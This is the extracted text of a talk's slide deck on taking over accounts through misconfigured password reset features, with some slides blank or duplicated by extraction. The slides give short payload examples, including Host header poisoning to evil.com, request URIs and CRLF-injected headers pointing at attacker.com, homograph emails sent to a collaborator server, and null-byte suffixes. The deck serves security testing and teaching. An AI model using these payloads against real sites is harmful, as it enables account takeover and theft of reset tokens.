Slide 1

Slide 1 text

Account Takeover via Exploiting Misconfigured Password Reset Feature By Tuhin Bose

Slide 2

Slide 2 text

Who am I?

Slide 3

Slide 3 text

Conclusion & QNA Conclusion & QNA What is Password What is Password Reset Feature? Reset Feature? Password Reset Password Reset Implementation Implementation Techniques Used by Techniques Used by Developers Developers ATO via Hacking ATO via Hacking Misconfigured Misconfigured Password Reset Feature Password Reset Feature AGENDA

Slide 4

Slide 4 text

What is Password Reset Feature?

Slide 5

Slide 5 text

Reset password is the action of invalidating the current password for an account on an application and then setting a new one. Most of the services have a password reset feature ("Forgot Password" service) which allows you to reset your password.

Slide 6

Slide 6 text

Password Reset Implementation Techniques Used by Developers

Slide 7

Slide 7 text

Password Reset Implementation Techniques Used by Developers

Slide 8

Slide 8 text

ATO via Hacking Misconfigured Password Reset Feature

Slide 9

Slide 9 text

Host Header Injection - Password Reset Host Header Injection - Password Reset Poisoning Poisoning 1 1. . Host: evil.com or X-Forwarded-Host: evil.com

Slide 10

Slide 10 text

Password Reset Poisoning Password Reset Poisoning 1 1. .

Slide 11

Slide 11 text

2. Modifying Request-URI 2. Modifying Request-URI POST https://attacker.com/forgot-password HTTP/1.1 POST @attacker.com/forgot-password HTTP/1.1 POST :@attacker.com/forgot-password HTTP/1.1 POST /[email protected] HTTP/1.1

Slide 12

Slide 12 text

2. Modifying Request-URI 2. Modifying Request-URI

Slide 13

Slide 13 text

2. Modifying Request-URI 2. Modifying Request-URI

Slide 14

Slide 14 text

3. Token leakage 3. Token leakage

Slide 15

Slide 15 text

3. Token leakage 3. Token leakage https://www.company.com/#/changePassword/ username/token

Slide 17

Slide 17 text

4. HTTP Parameter Pollution (HPP) 4. HTTP Parameter Pollution (HPP)

Slide 18

Slide 18 text

4. HTTP Parameter Pollution (HPP) 4. HTTP Parameter Pollution (HPP)

Slide 19

Slide 19 text

5. Insecure Direct Object Reference (IDOR) 5. Insecure Direct Object Reference (IDOR) Use Param Miner to get extra parameters (or append previously known parameters) in the request. Now try IDOR.

Slide 20

Slide 20 text

5. Insecure Direct Object Reference 5. Insecure Direct Object Reference

Slide 21

Slide 21 text

6. Try homograph on password reset. 6. Try homograph on password reset. [email protected] email=victim@gmаil.com [email protected] Using Unicode: Cyrillic Small Letter A

Slide 22

Slide 22 text

6. Try homograph on password reset. 6. Try homograph on password reset. https://github.com/UndeadSec/EvilURL

Slide 23

Slide 23 text

6. Try homograph on password reset. 6. Try homograph on password reset. Steps to reproduce: 1. Create a new account with [email protected] 2. Go to password reset page and enter this email: tuhin1729@gmаil.com.xyz.burpcollaborator.net [Here "a" is different] If it's vulnerable then you'll get the password reset link to your collaborator server.

Slide 24

Slide 24 text

7. If they are sending an otp for password reset, 7. If they are sending an otp for password reset, try 2fa bypass techniques. try 2fa bypass techniques. https://tinyurl.com/tuhin1729-2fa

Slide 25

Slide 25 text

8. 8. Append a .json after the endpoint. Append a .json after the endpoint.

Slide 26

Slide 26 text

9. Weak Encryption 9. Weak Encryption While generating password reset tokens, sometimes developers use weak encryption algorithms. For example, sometimes they just encrypt the user-id/username of user + timestrap using some weak encryption algorithms .

Slide 27

Slide 27 text

POST /resetpassword?%0d%0aHost:%20attacker.com HTTP/1.1 10. 10. CRLF Injection CRLF Injection

Slide 28

Slide 28 text

10. 10. CRLF Injection CRLF Injection

Slide 29

Slide 29 text

11. Change the request method and content-type and observe how the application is responding. Original Modified

Slide 30

Slide 30 text

12. Append null bytes after your email and observe the response. {"email":"[email protected]"} {"email":"[email protected]%00"} %00, %0d%0a, %0d, %0a, %09, %0C, %20

Slide 31

Slide 31 text

More: More: https://tinyurl.com/tuhin1729-passwordreset

Slide 32

Slide 32 text

Twitter: @tuhin1729_ | Medium: @tuhin1729 | Instagram: @tuhin1729 Thank You! Thank You! Thank You!